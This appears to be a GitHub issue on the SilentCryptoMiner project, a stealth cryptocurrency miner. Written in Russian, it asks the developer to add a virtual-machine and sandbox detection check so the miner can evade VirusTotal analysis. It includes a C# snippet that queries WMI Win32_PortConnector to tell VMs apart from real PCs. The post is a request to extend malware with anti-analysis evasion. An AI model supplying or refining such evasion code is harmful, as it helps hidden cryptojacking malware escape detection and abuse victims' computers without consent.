SilentCryptoMiner
SilentCryptoMiner copied to clipboard
VM Detected
Привет Унам следующее обновление добавьте этот код для обнаружения Sandboxie.VM хоть как-то обезопасить от VirusTotal
bool VM = (new System.Management.ManagementObjectSearcher("SELECT * FROM Win32_PortConnector")).Get().Count == 0;
if (VM)
{
MessageBox.Show("VM Detected");
}
else
{
MessageBox.Show("Real PC Detected");
}